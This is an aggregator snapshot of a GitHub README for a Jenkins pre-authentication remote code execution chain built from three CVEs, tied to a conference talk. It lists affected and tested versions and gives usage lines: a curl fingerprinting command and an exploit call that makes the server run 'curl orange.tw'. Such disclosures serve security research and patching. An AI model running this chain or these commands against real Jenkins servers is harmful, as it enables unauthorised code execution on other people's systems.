57
GitHub - orangetw/awesome-jenkins-rce-2019: There is no pre-auth RCE in Jenkins...
source link: https://github.com/orangetw/awesome-jenkins-rce-2019
Go to the source link to view the article. You can view the picture content, updated content and better typesetting reading experience. If the link is broken, please click the button below to view the snapshot at that time.
README.md
awesome-jenkins-rce-2019
There is no pre-auth RCE in Jenkins since May 2017, but this is the one!
It chains CVE-2018-1000861, CVE-2019-1003005 and CVE-2019-1003029 to a more reliable and elegant pre-auth remote code execution!
Affect list
-
ANONYMOUS_READ disable
- Jenkins version < 2.138
-
ANONYMOUS_READ enable(or with a normal user account)
- Jenkins build time < 2019-01-28
Usage
$ curl -s -I http://jenkins/| grep X-Jenkins X-Jenkins: 2.137 X-Jenkins-Session: 20f72c2e X-Jenkins-CLI-Port: 50000 X-Jenkins-CLI2-Port: 50000 $ python exp.py http://jenkins/ 'curl orange.tw' [*] ANONYMOUS_READ disable! [*] Bypass with CVE-2018-1000861! [*] Exploit success!(it should be :P)
Tested on
- Jenkins 2.53
- Jenkins 2.122
- Jenkins 2.137
- Jenkins 2.138 with ANONYMOUS_READ enable
- Jenkins 2.152 with ANONYMOUS_READ enable
- Jenkins 2.153 with ANONYMOUS_READ enable
- Script Security Plugin 1.43
- Script Security Plugin 1.48
Acknoledgements
- @orange_8361 for CVE-2018-1000861
- @0ang3el for CVE-2019-1003005
- @webpentest for CVE-2019-1003029
Part slides from my HITB AMS 2019 talk:
References
Recommend
About Joyk
Aggregate valuable and interesting links.
Joyk means Joy of geeK